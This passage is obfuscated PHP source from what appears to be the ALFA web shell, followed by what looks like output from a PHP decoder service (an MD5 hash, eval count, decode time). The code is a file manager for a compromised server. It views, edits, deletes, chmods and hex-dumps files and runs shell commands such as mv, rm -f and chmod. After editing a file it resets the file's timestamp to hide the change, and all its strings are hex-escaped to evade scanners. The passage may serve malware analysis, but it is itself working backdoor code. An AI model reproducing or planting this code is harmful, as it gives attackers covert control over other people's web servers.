 alfaFooter(); 
 return; 
} if ($chdir_fals) { $filesize = $file_info[3]; 
 $uid["\156\x61\x6d\x65"] = $file_info[1]; 
 $gid["\x6e\x61\155\x65"] = $file_info[2]; 
 $permcolor = alfaPermsColor(array("\x63\154\x61\163\163" => $perm_color_class, "\x6e\165\x6d" => $file_info[5], "\150\165\155\141\x6e" => $file_info[6]), true); 
} else { $uid = function_exists("\x70\x6f\x73\151\x78\137\x67\x65\x74\x70\167\x75\x69\x64") && function_exists("\146\151\x6c\x65\x6f\167\x6e\145\162") ? @posix_getpwuid(@fileowner($_POST["\x61\x6c\146\141\61"])) : ''; 
 $gid = function_exists("\x70\x6f\x73\x69\170\137\x67\x65\164\147\162\147\x69\144") && function_exists("\x66\151\x6c\x65\147\x72\x6f\x75\160") ? @posix_getgrgid(@filegroup($_POST["\x61\154\x66\x61\61"])) : ''; 
 if (!$uid && !$gid) { $uid["\x6e\141\155\x65"] = function_exists("\x66\x69\154\145\157\x77\x6e\x65\162") ? @fileowner($_POST["\x61\154\x66\141\x31"]) : ''; 
 $gid["\x6e\141\x6d\x65"] = function_exists("\146\x69\154\145\x67\162\157\165\x70") ? @filegroup($_POST["\141\x6c\146\x61\x31"]) : ''; 
} $permcolor = alfaPermsColor($_POST["\x61\154\x66\x61\61"]); 
 $filesize = @filesize($_POST["\x61\x6c\146\x61\61"]); 
 if (!isset($uid["\156\141\155\145"], $gid["\x6e\x61\x6d\145"]) || empty($uid["\x6e\x61\x6d\x65"]) || empty($gid["\x6e\141\155\145"])) { if (_alfa_can_runCommand()) { list($uid["\156\141\155\x65"], $gid["\156\141\155\x65"]) = explode("\x3a", alfaEx("\x73\164\141\164\x20\x2d\x63\40\x22\x25\125\x3a\45\107\x22\40\x22" . addslashes($_POST["\x63"] . "\57" . $_POST["\141\154\146\141\x31"]) . "\x22")); 
} } } if (substr($_POST["\x61\154\x66\141\61"], 0, 7) == "\x70\x68\x61\x72\72\x2f\x2f") { $alfa_file_directory = $_POST["\x61\154\x66\141\x31"]; 
} else { $alfa_file_directory = str_replace("\x2f\x2f", "\57", ($chdir_fals ? '' : $_POST["\x63"] . "\x2f") . $_POST["\x61\154\x66\141\x31"]); 
} echo "\74\x64\151\x76\x20\x73\164\171\154\145\75\x22\157\166\x65\162\146\x6c\x6f\167\x3a\x20\x68\151\144\144\x65\x6e\73\167\150\151\x74\x65\x2d\163\160\141\143\145\72\x20\x6e\x6f\167\x72\141\x70\73\x74\x65\x78\x74\55\157\x76\x65\162\x66\x6c\x6f\167\x3a\40\x65\x6c\x6c\151\x70\163\151\163\x3b\x22\76\x3c\163\160\141\156\40\x63\x6c\x61\x73\163\x3d\42\145\144\x69\164\157\162\137\146\x69\x6c\x65\x5f\151\156\x66\157\137\166\141\162\x73\x22\x3e\116\141\x6d\x65\72\x3c\x2f\x73\x70\141\156\x3e\40" . htmlspecialchars(basename($alfa1_decoded)) . "\x20\x3c\x73\160\141\x6e\x20\x63\x6c\x61\x73\163\75\x22\145\x64\x69\x74\x6f\162\x5f\x66\x69\154\145\x5f\151\156\x66\x6f\x5f\166\141\x72\x73\42\x3e\x53\151\172\x65\72\x3c\57\163\x70\x61\156\76\40" . alfaSize($filesize) . "\40\74\x73\x70\141\156\40\x63\x6c\x61\163\x73\x3d\x22\x65\144\151\164\x6f\x72\137\146\151\154\145\x5f\x69\x6e\146\x6f\x5f\x76\141\162\x73\42\76\x50\x65\x72\x6d\151\x73\x73\151\157\x6e\x3a\74\57\163\x70\x61\x6e\x3e\x20" . $permcolor . "\40\74\x73\x70\x61\x6e\40\143\x6c\x61\x73\163\x3d\x22\145\x64\151\164\x6f\x72\x5f\x66\151\154\x65\x5f\151\156\x66\157\x5f\166\x61\x72\x73\42\76\x4f\x77\156\145\162\x2f\107\x72\x6f\x75\160\x3a\x3c\57\x73\160\x61\x6e\76\x20" . $uid["\x6e\x61\x6d\145"] . "\57" . $gid["\156\141\x6d\x65"] . "\40\x3c\x73\160\x61\156\40\x63\x6c\x61\x73\x73\x3d\x22\x65\x64\151\x74\x6f\x72\x5f\146\151\154\145\137\x69\x6e\146\157\x5f\166\x61\162\163\42\x3e\104\x69\x72\x65\143\x74\157\162\x79\72\74\57\163\160\141\156\x3e\x20" . dirname($alfa_file_directory) . "\x3c\57\144\x69\166\76"; 
 if (empty($_POST["\141\x6c\146\x61\62"])) { $_POST["\141\x6c\146\141\x32"] = "\x76\x69\145\x77"; 
} if (!_alfa_is_dir($_POST["\141\154\146\x61\61"])) { $m = array("\x56\x69\145\167", "\x44\x6f\x77\156\x6c\x6f\141\144", "\x48\x69\147\150\154\x69\147\150\x74", "\x43\x68\155\x6f\x64", "\x52\x65\156\x61\155\145", "\x54\x6f\x75\x63\x68", "\104\145\x6c\x65\x74\x65", "\111\155\x61\147\145", "\110\x65\x78\x64\165\x6d\160"); 
 $ftype = "\146\x69\154\x65"; 
} else { $m = array("\103\150\155\x6f\x64", "\122\x65\156\x61\155\145", "\x54\x6f\165\x63\x68"); 
 $ftype = "\x64\151\162"; 
} echo "\x3c\x64\x69\166\76"; 
 foreach ($m as $v) { echo $v == "\104\x65\x6c\x65\164\x65" ? "\x3c\x61\40\150\162\x65\146\x3d\x22\x6a\141\166\141\x73\x63\162\x69\x70\x74\x3a\166\x6f\x69\144\50\x30\x29\73\x22\40\157\x6e\x63\154\x69\x63\153\x3d\x22\166\141\x72\x20\x63\150\153\x3d\x63\x6f\x6e\x66\151\162\x6d\x28\x27\101\162\x65\x20\x59\157\x75\x20\123\x75\x72\145\x20\106\157\162\40\104\145\x6c\x65\164\145\x20\x54\x68\151\163\x20\106\151\x6c\145\x20\77\x27\x29\73\x63\150\153\77\145\x64\151\164\x6f\162\x28\47" . addslashes(!isset($rename_cache) ? $_POST["\x61\x6c\146\x61\61"] : $rename_cache) . "\47\54\x27" . strtolower($v) . "\47\x2c\47\47\54\x27" . $_POST["\143"] . "\47\54\x27" . $_POST["\141\x6c\146\x61\x34"] . "\47\x2c\x27" . $ftype . "\x27\51\x3a\47\47\x3b\x22\76\74\x73\x70\141\156\x20\x63\x6c\141\163\x73\x3d\x22\145\144\151\164\x6f\x72\137\141\143\x74\x69\x6f\x6e\x73\42\76" . (strtolower($v) == @$_POST["\141\x6c\146\x61\62"] ? "\x3c\142\x3e\x3c\163\160\x61\156\x20\x63\154\141\163\163\x3d\42\145\x64\151\x74\x6f\x72\x5f\141\x63\164\151\x6f\x6e\x73\x22\76\x20" . $v . "\x20\74\x2f\163\160\141\156\x3e\40\74\57\x62\x3e" : $v) . "\40\174\40\x3c\x2f\163\160\141\156\x3e\x3c\x2f\x61\76\40" : "\74\141\x20\150\x72\x65\x66\x3d\42\x6a\x61\x76\141\163\143\162\x69\160\x74\x3a\166\x6f\151\144\50\x30\x29\x3b\42\x20\157\156\143\154\x69\143\153\x3d\x22\x65\144\x69\x74\x6f\162\50\x27" . addslashes(!isset($rename_cache) ? $_POST["\x61\154\146\141\61"] : $rename_cache) . "\x27\x2c\47" . strtolower($v) . "\47\54\x27\x27\54\x27" . $_POST["\143"] . "\47\54\47" . $_POST["\x61\x6c\146\141\x34"] . "\x27\x2c\47" . $ftype . "\x27\51\x22\76\x3c\x73\160\141\156\40\143\154\141\x73\x73\x3d\42\x65\x64\151\x74\157\x72\x5f\141\x63\164\x69\x6f\156\x73\x22\76" . (strtolower($v) == @$_POST["\x61\x6c\x66\x61\62"] ? "\74\x62\x3e\74\x73\x70\141\x6e\x20\143\x6c\141\x73\x73\x3d\x22\x65\144\x69\x74\157\162\137\x61\x63\164\x69\x6f\156\163\x22\x3e\x20" . $v . "\x20\x3c\57\x73\160\141\156\76\x20\74\x2f\142\x3e" : $v) . "\x20\174\x20\74\x2f\163\160\x61\x6e\76\74\57\141\x3e"; 
} echo "\x3c\x2f\144\151\166\x3e"; 
 switch ($_POST["\141\x6c\146\x61\x32"]) { case "\x76\151\x65\167": case "\145\144\x69\164": @chdir($_POST["\143"]); 
 $disabled_btn = ''; 
 if (!@is_writable($_POST["\x61\154\146\141\61"]) && !_alfa_is_writable($_POST["\141\x6c\x66\141\x31"])) { $disabled_btn = "\144\x69\163\141\142\154\x65\x64\x3d\144\x69\163\x61\x62\x6c\x65\x64"; 
 $disabled_btn_style = "\x62\x61\x63\153\147\x72\x6f\165\x6e\144\x3a\40\43\146\x66\60\x30\x30\60\73\143\x6f\x6c\x6f\x72\x3a\x20\43\x66\x66\146\73"; 
} if (!empty($_POST["\141\x6c\146\141\x33"])) { $_POST["\141\x6c\146\141\x33"] = substr($_POST["\x61\x6c\146\x61\x33"], 1); 
 $time = @filemtime($_POST["\141\x6c\x66\x61\x31"]); 
 $fp = @__write_file($_POST["\141\154\146\x61\x31"], $_POST["\x61\x6c\146\141\x33"]); 
 if ($chdir_fals && $alfa_canruncmd) { $rname = $alfa1_decoded; 
 $randname = $rname . rand(111, 9999); 
 $filepath = dirname($_SERVER["\x53\x43\122\x49\120\124\x5f\x46\x49\x4c\x45\x4e\x41\115\105"]) . "\x2f" . $randname; 
 if ($fp = @__write_file($filepath, $_POST["\141\x6c\x66\x61\x33"])) { alfaEx("\155\166\40\x27" . addslashes($filepath) . "\x27\x20\47" . addslashes($_POST["\141\x6c\x66\x61\x31"]) . "\x27\73\162\x6d\x20\x2d\x66\40\47" . addslashes($filepath) . "\x27"); 
} } if ($fp) { echo "\x53\x61\x76\145\x64\x21\74\142\x72\x3e"; 
 @touch($_POST["\141\154\146\x61\x31"], $time, $time); 
} } echo "\74\x64\151\166\40\143\154\141\x73\163\x3d\42\x65\x64\x69\164\157\x72\x2d\x76\x69\x65\167\x22\x3e\74\x64\151\166\x20\143\x6c\141\163\163\x3d\42\166\x69\145\167\55\143\x6f\156\164\x65\x6e\x74\x20\145\x64\x69\164\157\x72\55\x61\143\145\x2d\x63\x6f\x6e\164\x72\x6f\154\x6c\145\162\42\76\74\x64\151\x76\x20\x73\164\171\154\x65\75\42\x64\151\163\x70\x6c\x61\171\x3a\151\156\x6c\151\156\145\55\x62\154\x6f\143\153\73\x22\x3e" . _alfa_load_ace_options("\x65\x64\x69\164\157\162") . "\x3c\142\165\164\164\157\x6e\x20\163\164\171\154\145\x3d\x22\x62\x6f\162\144\x65\162\55\162\x61\x64\151\x75\163\x3a\61\60\x70\170\x3b\42\40\143\x6c\x61\x73\163\x3d\x22\x62\165\164\x74\x6f\x6e\x20\141\x63\x65\55\x63\157\x6e\x74\162\157\x6c\145\x72\x22\x20\x6f\x6e\x43\154\151\143\x6b\x3d\42\143\157\160\171\x54\x6f\x43\x6c\x69\160\142\x6f\x61\162\144\50\164\150\151\163\x29\73\42\76\103\157\160\171\74\x2f\x62\165\x74\164\x6f\x6e\76\40\74\x62\165\x74\x74\157\x6e\x20\x63\154\141\x73\163\75\x22\142\165\x74\164\157\x6e\40\x61\x63\145\55\x63\157\x6e\164\x72\157\154\x65\x72\x22\40\157\156\x63\154\151\x63\153\x3d\42\141\154\x66\x61\101\x63\145\x54\157\106\165\x6c\x6c\163\x63\162\145\x65\x6e\50\164\x68\x69\x73\51\73\x22\x3e\x46\165\x6c\x6c\x20\123\x63\x72\x65\145\x6e\74\57\x62\x75\x74\x74\157\156\76\x20\x3c\x62\165\164\x74\157\x6e\x20\x6f\x6e\143\154\x69\x63\x6b\x3d\x22\x76\x61\162\40\x61\143\x65\x5f\166\141\154\x20\75\40\x61\x6c\x66\x61\137\x61\x63\x65\x5f\x65\x64\x69\x74\x6f\162\163\x2e\x65\144\151\164\x6f\162\x5b\x74\150\x69\163\x2e\x67\145\164\101\164\x74\162\151\x62\165\x74\x65\50\47\x61\x63\145\x5f\151\x64\47\51\x5d\x2e\147\x65\164\126\141\x6c\165\x65\x28\x29\73\145\x64\x69\164\x6f\x72\x28\47" . addslashes($alfa1_decoded) . "\47\54\x27\145\x64\x69\x74\47\54\47\x31\47\53\x61\x63\x65\137\166\141\x6c\54\47" . $_POST["\143"] . "\x27\x2c\x27" . $_POST["\141\x6c\146\x61\64"] . "\x27\54\x27" . $ftype . "\x27\51\x3b\162\145\164\165\x72\156\x20\146\141\154\x73\x65\x3b\x22\40\143\x6c\141\163\163\75\42\x62\x75\x74\164\157\x6e\x20\141\x63\145\x2d\x63\157\156\164\x72\157\x6c\145\x72\x20\141\x63\x65\x2d\x73\141\x76\x65\x2d\x62\x74\x6e\42\40\x73\164\x79\154\145\x3d\42\x77\x69\144\164\150\x3a\40\61\x30\60\160\x78\x3b\150\145\151\147\x68\164\x3a\x20\63\x33\160\x78\x3b" . $disabled_btn_style . "\42\x20" . $disabled_btn . "\x3e\x73\x61\166\145\x3c\x2f\142\165\164\164\157\x6e\x3e\74\x2f\x64\x69\166\x3e\74\160\x72\145\40\143\154\x61\x73\163\75\42\x6d\x6c\61\40\166\x69\x65\x77\137\155\x6c\x5f\143\x6f\156\x74\x65\156\x74\42\x3e"; 
 echo htmlspecialchars(__read_file($_POST["\x61\x6c\146\141\x31"])); 
 echo "\74\57\x70\162\x65\x3e\x3c\57\x64\151\x76\x3e\x3c\57\x64\151\166\x3e"; 
 break; 
 case "\x68\151\x67\x68\154\x69\147\x68\x74": @chdir($_POST["\x63"]); 
 if (@is_readable($_POST["\x61\154\x66\x61\x31"])) { echo "\74\144\151\166\40\143\x6c\141\163\163\75\x22\145\x64\x69\x74\x6f\162\55\166\x69\145\x77\42\76\74\x64\151\x76\x20\x63\x6c\x61\x73\x73\x3d\x22\166\151\x65\167\55\x63\x6f\156\x74\x65\x6e\164\x22\76\x3c\x64\151\x76\40\x63\x6c\141\163\x73\75\42\155\154\61\42\40\163\x74\171\154\x65\75\42\142\141\x63\x6b\x67\162\157\165\x6e\144\x2d\143\x6f\x6c\x6f\162\72\40\x23\145\x31\x65\x31\145\x31\x3b\x63\x6f\x6c\x6f\162\x3a\142\x6c\x61\x63\153\73\x22\76"; 
 $code = @highlight_file($_POST["\141\154\x66\x61\x31"], true); 
 echo str_replace(array("\x3c\x73\x70\141\x6e\40", "\x3c\57\x73\x70\x61\156\x3e"), array("\74\x66\x6f\x6e\x74\x20", "\74\57\x66\x6f\x6e\x74\x3e"), $code) . "\x3c\57\144\151\166\x3e\x3c\57\x64\151\x76\x3e\x3c\57\144\x69\x76\x3e"; 
} break; 
 case "\x64\x65\x6c\x65\x74\145": @chdir($_POST["\143"]); 
 if (@is_writable($_POST["\x61\154\x66\x61\x31"]) || $GLOBALS["\x67\x6c\x6f\142\x5f\143\150\144\x69\x72\137\146\x61\x6c\x73\145"]) { $deleted = true; 
 if (!@unlink($_POST["\141\x6c\x66\x61\x31"])) { $deleted = false; 
 if ($alfa_canruncmd) { if (_alfa_is_writable($_POST["\x61\154\146\141\61"])) { alfaEx("\x72\x6d\40\x2d\x66\40\47" . addslashes($_POST["\x61\x6c\x66\141\x31"]) . "\47"); 
 $deleted = true; 
} } } if ($deleted) { echo "\106\x69\154\x65\x20\104\145\154\145\164\x65\144\x2e\56\56\74\163\x63\x72\x69\160\164\76\166\x61\x72\40\145\154\145\155\x20\x3d\x20\x24\x28\x22" . $_POST["\x61\154\x66\x61\x34"] . "\42\x29\x2e\160\x61\162\145\x6e\x74\116\157\x64\145\x3b\145\x6c\145\155\56\x70\141\x72\x65\x6e\x74\116\157\x64\x65\x2e\x72\x65\155\157\166\x65\x43\150\x69\x6c\144\50\145\154\145\x6d\51\x3b\144\x65\154\145\x74\x65\40\x65\x64\151\164\x6f\x72\x5f\146\151\154\145\x73\x5b\x22" . $_POST["\x61\x6c\x66\x61\64"] . "\x22\x5d\x3b\x3c\x2f\163\143\162\x69\160\x74\76"; 
} else { echo "\x45\162\162\157\x72\x2e\56\56"; 
} } break; 
 case "\143\150\x6d\157\x64": @chdir($_POST["\x63"]); 
 if (!empty($_POST["\141\154\x66\x61\x33"])) { $perms = 0; 
 for ($i = strlen($_POST["\141\x6c\x66\x61\63"]) - 1; 
 $i >= 0; 
 --$i) { $perms += (int) $_POST["\141\x6c\x66\x61\63"][$i] * pow(8, strlen($_POST["\141\154\146\x61\63"]) - $i - 1); 
} if (!@chmod($_POST["\141\154\x66\x61\61"], $perms)) { if ($chdir_fals && $alfa_canruncmd) { alfaEx("\143\x64\40\47" . addslashes($_POST["\143"]) . "\x27\x3b\143\x68\155\x6f\144\x20" . addslashes($_POST["\x61\x6c\x66\141\x33"]) . "\40\x27" . addslashes($alfa1_decoded) . "\x27"); 
 echo "\x53\x75\143\x63\145\163\x73\x21"; 
} else { echo "\x3c\x66\x6f\x6e\x74\x20\143\x6f\x6c\x6f\162\75\x22\x23\106\106\x46\x46\106\x46\42\x3e\74\x62\76\x43\x61\x6e\47\164\40\163\145\x74\x20\x70\145\162\x6d\151\163\163\151\157\x6e\x73\x21\x3c\x2f\142\x3e\x3c\57\146\x6f\156\164\x3e\x3c\142\x72\x3e\74\x73\143\x72\x69\x70\164\x3e\x64\157\x63\165\x6d\145\x6e\164\56\x6d\146\x2e\x61\154\146\141\63\x2e\x76\x61\154\165\145\75\x22\x22\73\x3c\57\163\143\x72\x69\160\x74\x3e"; 
} } else { echo "\123\x75\143\x63\145\x73\x73\41"; 
} } clearstatcache(); 
 AlfaNum(8, 9, 10, 7, 6, 5, 4, 2, 1); 
 if ($chdir_fals) { $file_perm = $file_info[5]; 
} else { $file_perm = substr(sprintf("\x25\157", @fileperms($_POST["\x61\154\x66\141\x31"])), -4); 
} echo "\x3c\163\x63\162\151\160\164\x3e\141\154\x66\141\63\x5f\75\x22\x22\x3b\74\x2f\x73\143\162\x69\160\164\76\x3c\x66\157\x72\x6d\40\x6f\156\x73\165\x62\x6d\151\x74\x3d\x22\145\x64\151\164\157\162\50\47" . addslashes($_POST["\141\154\x66\x61\x31"]) . "\x27\x2c\x27" . $_POST["\141\x6c\146\x61\62"] . "\x27\x2c\x74\x68\x69\163\x2e\x63\x68\x6d\157\x64\56\x76\x61\x6c\165\x65\x2c\47" . $_POST["\x63"] . "\x27\x2c\x27" . $_POST["\x61\154\x66\x61\64"] . "\x27\54\x27" . $ftype . "\x27\51\73\162\145\x74\165\162\156\40\146\x61\154\163\x65\x3b\42\x3e\x3c\151\156\x70\165\x74\x20\x74\x79\x70\145\x3d\x22\x74\145\170\x74\42\x20\156\141\x6d\145\75\42\143\x68\155\157\144\42\x20\166\x61\154\165\145\75\x22" . $file_perm . "\x22\x3e\74\151\x6e\x70\x75\164\x20\164\x79\x70\x65\x3d\163\x75\142\x6d\151\164\x20\x76\x61\154\165\145\75\42\x20\42\x3e\74\x2f\146\157\x72\155\x3e"; 
 break; 
 case "\x68\145\x78\144\165\155\160": @chdir($_POST["\143"]); 
 $c = __read_file($_POST["\141\x6c\146\141\x31"]); 
 $n = 0; 
 $h = array("\x30\60\60\x30\x30\60\60\x30\x3c\142\x72\76", '', ''); 
 $len = strlen($c); 
 for ($i = 0; 
 $i < $len; 
 ++$i) { $h[1] .= sprintf("\x25\x30\x32\x58", ord($c[$i])) . "\x20"; 
 switch (ord($c[$i])) { case 0: $h[2] .= "\x20"; 
 break;

Function Calls

None

Variables

None

Stats

MD5 39afe93d24b1a0c419a44ccdea734f83
Eval Count 0
Decode Time 111 ms